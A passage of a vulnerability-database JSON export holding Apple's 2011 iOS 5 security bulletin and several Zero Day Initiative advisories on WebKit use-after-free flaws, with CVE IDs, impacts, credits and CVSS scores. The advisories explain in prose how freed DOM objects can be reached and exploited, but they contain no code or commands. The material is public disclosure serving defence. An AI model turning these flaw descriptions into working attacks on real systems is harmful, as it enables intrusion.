hashes may expose\r\nusers to spoofing and information disclosure as attacks improve\r\nDescription: Certificates signed using the MD5 hash algorithm were\r\naccepted by iOS. This algorithm has known cryptographic weaknesses.\r\nFurther research or a misconfigured certificate authority could have\r\nallowed the creation of X.509 certificates with attacker controlled\r\nvalues that would have been trusted by the system. This would have\r\nexposed X.509 based protocols to spoofing, man in the middle attacks,\r\nand information disclosure. This update disables support for an X.509\r\ncertificate with an MD5 hash for any use other than as a trusted root\r\ncertificate.\r\nCVE-ID\r\nCVE-2011-3427\r\n\r\nData Security\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: An attacker could decrypt part of a SSL connection\r\nDescription: Only the SSLv3 and TLS 1.0 versions of SSL were\r\nsupported. These versions are subject to a protocol weakness when\r\nusing block ciphers. A man-in-the-middle attacker could have injected\r\ninvalid data, causing the connection to close but revealing some\r\ninformation about the previous data. If the same connection was\r\nattempted repeatedly the attacker may eventually have been able to\r\ndecrypt the data being sent, such as a password. This issue is\r\naddressed by adding support for TLS 1.2.\r\nCVE-ID\r\nCVE-2011-3389\r\n\r\nHome screen\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Switching between applications may lead to the disclosure of\r\nsensitive application information\r\nDescription: When switching between applications with the four-\r\nfinger app switching gesture, the display could have revealed the\r\nprevious application state. This issue is addressed by ensuring that\r\nthe system properly calls the applicationWillResignActive: method\r\nwhen transitioning between applications.\r\nCVE-ID\r\nCVE-2011-3431 : Abe White of Hedonic Software Inc.\r\n\r\nImageIO\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Viewing a maliciously crafted TIFF image may result in an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A buffer overflow existed in libTIFF's handling of\r\nCCITT Group 4 encoded TIFF images.\r\nCVE-ID\r\nCVE-2011-0192 : Apple\r\n\r\nImageIO\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in ImageIO's handling of\r\nCCITT Group 4 encoded TIFF images.\r\nCVE-ID\r\nCVE-2011-0241 : Cyril CATTIAUX of Tessi Technologies\r\n\r\nInternational Components for Unicode\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Applications that use ICU may be vulnerable to an unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A buffer overflow issue existed in ICU's generation of\r\ncollation keys for long strings of mostly uppercase letters.\r\nCVE-ID\r\nCVE-2011-0206 : David Bienvenu of Mozilla\r\n\r\nKernel\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: A remote attacker may cause a device reset\r\nDescription: The kernel failed to promptly reclaim memory from\r\nincomplete TCP connections. An attacker with the ability to connect\r\nto a listening service on an iOS device could exhaust system\r\nresources.\r\nCVE-ID\r\nCVE-2011-3259 : Wouter van der Veer of Topicus I&I, and Josh Enders\r\n\r\nKernel\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: A local user may be able to cause a system reset\r\nDescription: A null dereference issue existed in the handling of\r\nIPV6 socket options.\r\nCVE-ID\r\nCVE-2011-1132 : Thomas Clement of Intego\r\n\r\nKeyboards\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: A user may be able to determine information about the last\r\ncharacter of a password\r\nDescription: The keyboard used to type the last character of a\r\npassword was briefly displayed the next time the keyboard was used.\r\nCVE-ID\r\nCVE-2011-3245 : Paul Mousdicas\r\n\r\nlibxml\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Visiting a maliciously crafted website may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A one-byte heap buffer overflow existed in libxml's\r\nhandling of XML data.\r\nCVE-ID\r\nCVE-2011-0216 : Billy Rios of the Google Security Team\r\n\r\nOfficeImport\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Viewing a maliciously crafted Word file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A buffer overflow existed in OfficeImport's handling of\r\nMicrosoft Word documents.\r\nCVE-ID\r\nCVE-2011-3260 : Tobias Klein working with Verisign iDefense Labs\r\n\r\nOfficeImport\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Viewing a maliciously crafted Excel file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A double free issue existed in OfficeImport's handling\r\nof Excel files.\r\nCVE-ID\r\nCVE-2011-3261 : Tobias Klein of www.trapkit.de\r\n\r\nOfficeImport\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Downloading a maliciously crafted Microsoft Office file may\r\nlead to an unexpected application termination or arbitrary code\r\nexecution\r\nDescription: A memory corruption issue existed in OfficeImport's\r\nhandling of Microsoft Office files.\r\nCVE-ID\r\nCVE-2011-0208 : Tobias Klein working with iDefense VCP\r\n\r\nOfficeImport\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Downloading a maliciously crafted Excel file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in OfficeImport's\r\nhandling of Excel files.\r\nCVE-ID\r\nCVE-2011-0184 : Tobias Klein working with iDefense VCP\r\n\r\nSafari\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Opening maliciously crafted files on certain websites may\r\nlead to a cross-site scripting attack\r\nDescription: iOS did not support the 'attachment' value for the HTTP\r\nContent-Disposition header. This header is used by many websites to\r\nserve files that were uploaded to the site by a third-party, such as\r\nattachments in web-based e-mail applications. Any script in files\r\nserved with this header value would run as if the file had been\r\nserved inline, with full access to other resources on the origin\r\nserver. This issue is addressed by loading attachments in an isolated\r\nsecurity origin with no access to resources on other sites.\r\nCVE-ID\r\nCVE-2011-3426 : Christian Matthies working with iDefense VCP,\r\nYoshinori Oota from Business Architects Inc working with JP/CERT\r\n\r\nSettings\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: An attacker with physical access to a device may be able to\r\nrecover the restrictions passcode\r\nDescription: The parental restrictions functionality enforces UI\r\nrestrictions. Configuring parental restrictions is protected by a\r\npasscode, which was previously stored in plaintext on disk. This\r\nissue is addressed by securely storing the parental restrictions\r\npasscode in the system keychain.\r\nCVE-ID\r\nCVE-2011-3429 : an anonymous reporter\r\n\r\nSettings\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Misleading UI\r\nDescription: Configurations and settings applied via configuration\r\nprofiles did not appear to function properly under any non-English\r\nlanguage. Settings could be improperly displayed as a result. This\r\nissue is addressed by fixing a localization error.\r\nCVE-ID\r\nCVE-2011-3430 : Florian Kreitmaier of Siemens CERT\r\n\r\nUIKit Alerts\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Visiting a malicious website may cause an unexpected device\r\nhang\r\nDescription: An excessive maximum text layout length permitted\r\nmalicious websites to cause iOS to hang when drawing acceptance\r\ndialogs for very long tel: URIs. This issue is addressed by using a\r\nmore reasonable maximum URI size.\r\nCVE-ID\r\nCVE-2011-3432 : Simon Young of Anglia Ruskin University\r\n\r\nWebKit\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Visiting a maliciously crafted website may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in WebKit.\r\nCVE-ID\r\nCVE-2011-0218 : SkyLined of Google Chrome Security Team\r\nCVE-2011-0221 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0222 : Nikita Tarakanov and Alex Bazhanyuk of the CISS\r\nResearch Team, and Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0225 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0232 : J23 working with TippingPoint's Zero Day Initiative\r\nCVE-2011-0233 : wushi of team509 working with TippingPoint's Zero Day\r\nInitiative\r\nCVE-2011-0234 : Rob King working with TippingPoint's Zero Day\r\nInitiative, wushi of team509 working with TippingPoint's Zero Day\r\nInitiative\r\nCVE-2011-0235 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0238 : Adam Barth of Google Chrome Security Team\r\nCVE-2011-0254 : An anonymous researcher working with TippingPoint's\r\nZero Day Initiative\r\nCVE-2011-0255 : An anonymous reporter working with TippingPoint's\r\nZero Day Initiative\r\nCVE-2011-0981 : Rik Cabanier of Adobe Systems, Inc\r\nCVE-2011-0983 : Martin Barbella\r\nCVE-2011-1109 : Sergey Glazunov\r\nCVE-2011-1114 : Martin Barbella\r\nCVE-2011-1115 : Martin Barbella\r\nCVE-2011-1117 : wushi of team509\r\nCVE-2011-1121 : miaubiz\r\nCVE-2011-1188 : Martin Barbella\r\nCVE-2011-1203 : Sergey Glazunov\r\nCVE-2011-1204 : Sergey Glazunov\r\nCVE-2011-1288 : Andreas Kling of Nokia\r\nCVE-2011-1293 : Sergey Glazunov\r\nCVE-2011-1296 : Sergey Glazunov\r\nCVE-2011-1449 : Marek Majkowski\r\nCVE-2011-1451 : Sergey Glazunov\r\nCVE-2011-1453 : wushi of team509 working with TippingPoint's Zero Day\r\nInitiative\r\nCVE-2011-1457 : John Knottenbelt of Google\r\nCVE-2011-1462 : wushi of team509\r\nCVE-2011-1797 : wushi of team509\r\nCVE-2011-2338 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam using AddressSanitizer\r\nCVE-2011-2339 : Cris Neckar of the Google Chrome Security Team\r\nCVE-2011-2341 : Apple\r\nCVE-2011-2351 : miaubiz\r\nCVE-2011-2352 : Apple\r\nCVE-2011-2354 : Apple\r\nCVE-2011-2356 : Adam Barth and Abhishek Arya of Google Chrome\r\nSecurity Team using AddressSanitizer\r\nCVE-2011-2359 : miaubiz\r\nCVE-2011-2788 : Mikolaj Malecki of Samsung\r\nCVE-2011-2790 : miaubiz\r\nCVE-2011-2792 : miaubiz\r\nCVE-2011-2797 : miaubiz\r\nCVE-2011-2799 : miaubiz\r\nCVE-2011-2809 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-2813 : Cris Neckar of Google Chrome Security Team using\r\nAddressSanitizer\r\nCVE-2011-2814 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam using AddressSanitizer\r\nCVE-2011-2816 : Apple\r\nCVE-2011-2817 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam using AddressSanitizer\r\nCVE-2011-2818 : Martin Barbella\r\nCVE-2011-2820 : Raman Tenneti and Philip Rogers of Google\r\nCVE-2011-2823 : SkyLined of Google Chrome Security Team\r\nCVE-2011-2827 : miaubiz\r\nCVE-2011-2831 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam using AddressSanitizer\r\nCVE-2011-3232 : Aki Helin of OUSPG\r\nCVE-2011-3234 : miaubiz\r\nCVE-2011-3235 : Dimitri Glazkov, Kent Tamura, Dominic Cooney of the\r\nChromium development community, and Abhishek Arya (Inferno) of Google\r\nChrome Security Team\r\nCVE-2011-3236 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam using AddressSanitizer\r\nCVE-2011-3237 : Dimitri Glazkov, Kent Tamura, Dominic Cooney of the\r\nChromium development community, and Abhishek Arya (Inferno) of Google\r\nChrome Security Team\r\nCVE-2011-3244 : vkouchna\r\n\r\nWebKit\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Visiting a maliciously crafted website may lead to a cross-\r\nsite scripting attack\r\nDescription: A cross-origin issue existed in the handling of URLs\r\nwith an embedded username. This issue is addressed through improved\r\nhandling of URLs with an embedded username.\r\nCVE-ID\r\nCVE-2011-0242 : Jobert Abma of Online24\r\n\r\nWebKit\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Visiting a maliciously crafted website may lead to a cross-\r\nsite scripting attack\r\nDescription: A cross-origin issue existed in the handling of DOM\r\nnodes.\r\nCVE-ID\r\nCVE-2011-1295 : Sergey Glazunov\r\n\r\nWebKit\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: A maliciously crafted website may be able to cause a\r\ndifferent URL to be shown in the address bar\r\nDescription: A URL spoofing issue existed in the handling of the DOM\r\nhistory object.\r\nCVE-ID\r\nCVE-2011-1107 : Jordi Chancel\r\n\r\nWebKit\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Visiting a maliciously crafted website may lead to arbitrary\r\ncode execution\r\nDescription: A configuration issue existed in WebKit's use of\r\nlibxslt. Visiting a maliciously crafted website may lead to arbitrary\r\nfiles being created with the privileges of the user, which may lead\r\nto arbitrary code execution. This issue is addressed through improved\r\nlibxslt security settings.\r\nCVE-ID\r\nCVE-2011-1774 : Nicolas Gregoire of Agarri\r\n\r\nWebKit\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Visiting a malicious website and dragging content in the\r\npage may lead to an information disclosure\r\nDescription: A cross-origin issue existed in WebKit's handling of\r\nHTML5 drag and drop. This issue is addressed by disallowing drag and\r\ndrop across different origins.\r\nCVE-ID\r\nCVE-2011-0166 : Michal Zalewski of Google Inc.\r\n\r\nWebKit\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Visiting a maliciously crafted website may lead to an\r\ninformation disclosure\r\nDescription: A cross-origin issue existed in the handling of Web\r\nWorkers.\r\nCVE-ID\r\nCVE-2011-1190 : Daniel Divricean of divricean.ro\r\n\r\nWebKit\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Visiting a maliciously crafted website may lead to a cross-\r\nsite scripting attack\r\nDescription: A cross-origin issue existed in the handling of the\r\nwindow.open method.\r\nCVE-ID\r\nCVE-2011-2805 : Sergey Glazunov\r\n\r\nWebKit\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Visiting a maliciously crafted website may lead to a cross-\r\nsite scripting attack\r\nDescription: A cross-origin issue existed in the handling of\r\ninactive DOM windows.\r\nCVE-ID\r\nCVE-2011-3243 : Sergey Glazunov\r\n\r\nWebKit\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Visiting a maliciously crafted website may lead to a cross-\r\nsite scripting attack\r\nDescription: A cross-origin issue existed in the handling of the\r\ndocument.documentURI property.\r\nCVE-ID\r\nCVE-2011-2819 : Sergey Glazunov\r\n\r\nWebKit\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: A maliciously crafted website may be able to track the URLs\r\nthat a user visits within a frame\r\nDescription: A cross-origin issue existed in the handling of the\r\nbeforeload event.\r\nCVE-ID\r\nCVE-2011-2800 : Juho Nurminen\r\n\r\nWiFi\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: WiFi credentials may be logged to a local file\r\nDescription: WiFi credentials including the passphrase and\r\nencryption keys were logged to a file that was readable by\r\napplications on the system. This is resolved by no longer logging\r\nthese credentials.\r\nCVE-ID\r\nCVE-2011-3434 : Laurent OUDOT of TEHTRI Security\r\n\r\nInstallation note:\r\n\r\nThis update is only available through iTunes, and will not appear\r\nin your computer's Software Update application, or in the Apple\r\nDownloads site. Make sure you have an Internet connection and have\r\ninstalled the latest version of iTunes from www.apple.com/itunes/\r\n\r\niTunes will automatically check Apple's update server on its weekly\r\nschedule. When an update is detected, it will download it. When\r\nthe iPhone, iPod touch or iPad is docked, iTunes will present the\r\nuser with the option to install the update. We recommend applying\r\nthe update immediately if possible. Selecting Don't Install will\r\npresent the option the next time you connect your iPhone, iPod touch,\r\nor iPad.\r\n\r\nThe automatic update process may take up to a week depending on the\r\nday that iTunes checks for updates. You may manually obtain the\r\nupdate via the Check for Updates button within iTunes. After doing\r\nthis, the update can be applied when your iPhone, iPod touch, or iPad\r\nis docked to your computer.\r\n\r\nTo check that the iPhone, iPod touch, or iPad has been updated:\r\n\r\n* Navigate to Settings\r\n* Select General\r\n* Select About. The version after applying this update will be\r\n"5 (9A334)".\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: http://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.16 (Darwin)\r\n\r\niQEcBAEBAgAGBQJOldmtAAoJEGnF2JsdZQee/qMIAIPxmIiOqj+FMLFHZtPeC/Dp\r\n3s4JliKOOgNnjXkxErfaNvYGmeVbDaUER5jdVrWccTauzlYmy8G4uK0An2GD2YiP\r\ngB5AiCQXpONdBCi38QNdRqrYoYjc8Sa0nUp4r5uWPoiHoj5KfxvBpgygEL+zjHXS\r\nfmnrONOCWhOYp0w4q6mdTg5BH2uJCbXscD/JjbmgHQI0Vs/iUZKSRyqFo2b0Mvze\r\nNiSyzcj/4l62Cxx7xM9VbdrYL7Al2yyHfNYJQsZmoeDUlJQcdgEgEMXvOuhY3sFK\r\nmaxYr2oCp6Mtf53fplAeJIV4ijLynEWAKxTuTznAyW1k7oiGrDTfORSFKPEB9MQ=\r\n=LCQZ\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2011-10-15T00:00:00", "published": "2011-10-15T00:00:00", "id": "SECURITYVULNS:DOC:27151", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27151", "title": "APPLE-SA-2011-10-12-1 iOS 5 Software Update", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "description": "ZDI-11-241: Webkit setAttributes attributeChanged Remote Code Execution Vulnerability\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-241\r\n\r\nJuly 27, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-0254\r\n\r\n-- CVSS:\r\n7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\n\r\n-- Affected Vendors:\r\nWebKit\r\n\r\n-- Affected Products:\r\nWebKit \r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 11481. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of the Webkit Library. User interaction is\r\nrequired to exploit this vulnerability in that the target must visit a\r\nmalicious page or open a malicious file.\r\n\r\nThe specific flaw exists within the NamedNodeMap::setAttributes method\r\ndefined within the NamedNodeMap.cpp file distributed with WebKit. The\r\ncode responsible for copying attributes between DOM nodes does not\r\nverify that a mutation may have occurred when an attribute's\r\nattributeChanged method is called. By crafting a page that deletes\r\ninstances of that attribute when the above mentioned method is called\r\nthe code within setAttributes can be made to operate on freed objects.\r\nAn attacker can take advantage of this by spraying the heap in a way\r\nthat will not result in null pointers being referenced. This can lead to\r\narbitrary code execution under the context of the user running the\r\nbrowser.\r\n\r\n-- Vendor Response:\r\nWebKit has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\nhttp://support.apple.com/kb/HT4808\r\n\r\n-- Disclosure Timeline:\r\n2011-04-19 - Vulnerability reported to vendor\r\n2011-07-27 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "modified": "2011-08-01T00:00:00", "published": "2011-08-01T00:00:00", "id": "SECURITYVULNS:DOC:26757", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26757", "title": "ZDI-11-241: Webkit setAttributes attributeChanged Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2016-11-09T00:17:57", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari Webkit. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the application's implementation of a Frame element. When attaching this element to a document, the application will duplicate a reference of an anonymous block. When freeing the container holding the Frame element, the reference will still be available. If an attacker can perform an explicit type change of the contents the element this can then be leveraged to gain code execution under the context of the application.", "modified": "2011-11-09T00:00:00", "published": "2011-04-19T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-138", "id": "ZDI-11-138", "title": "Webkit Undefined DOM Prototype Attach Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:59", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari Webkit. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the library's implementation of a FrameOwner element. When building this tree, the application will create a duplicate reference of an element. By freeing the referenced element, a use-after-free condition can be made to occur which can lead to code execution under the context of the application.", "modified": "2011-11-09T00:00:00", "published": "2011-07-27T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-239", "id": "ZDI-11-239", "title": "Apple Safari Webkit FrameOwner Element Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:50", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari's Webkit. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the library's support of SVG markers. When updating a marker, the application will duplicate the reference of an object without updating it's reference count. When freeing this object, a use-after-free vulnerability can be made to occur. This can be leveraged by a remote attacker to execute code under the context of the user running the application.", "modified": "2011-11-09T00:00:00", "published": "2011-07-27T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-240", "id": "ZDI-11-240", "title": "Apple Safari Webkit SVG Marker Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:11", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Webkit Library. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the NamedNodeMap::setAttributes method defined within the NamedNodeMap.cpp file distributed with WebKit. The code responsible for copying attributes between DOM nodes does not verify that a mutation may have occurred when an attribute's attributeChanged method is called. By crafting a page that deletes instances of that attribute when the above mentioned method is called the code within setAttributes can be made to operate on freed objects. An attacker can take advantage of this by spraying the heap in a way that will not result in null pointers being referenced. This can lead to arbitrary code execution under the context of the user running the browser.", "modified": "2011-11-09T00:00:00", "published": "2011-07-27T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-241", "id": "ZDI-11-241", "title": "Webkit setAttributes attributeChanged Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:05", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari WebKit. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within how the application manages a reference to an anonymous block located near a particular element within the document. When cloning this element, the application will duplicate a reference to the block and then later re-attach this element to the rendering tree. During this process the library will free the original rendering element. Subsequent access to the same element will then cause the library to use the freed object. This can be utilized to achieve code execution under the context of the application.", "modified": "2011-11-09T00:00:00", "published": "2011-04-19T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-140", "id": "ZDI-11-140", "title": "Webkit Detached Body Element Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:08", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari's Webkit. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within how 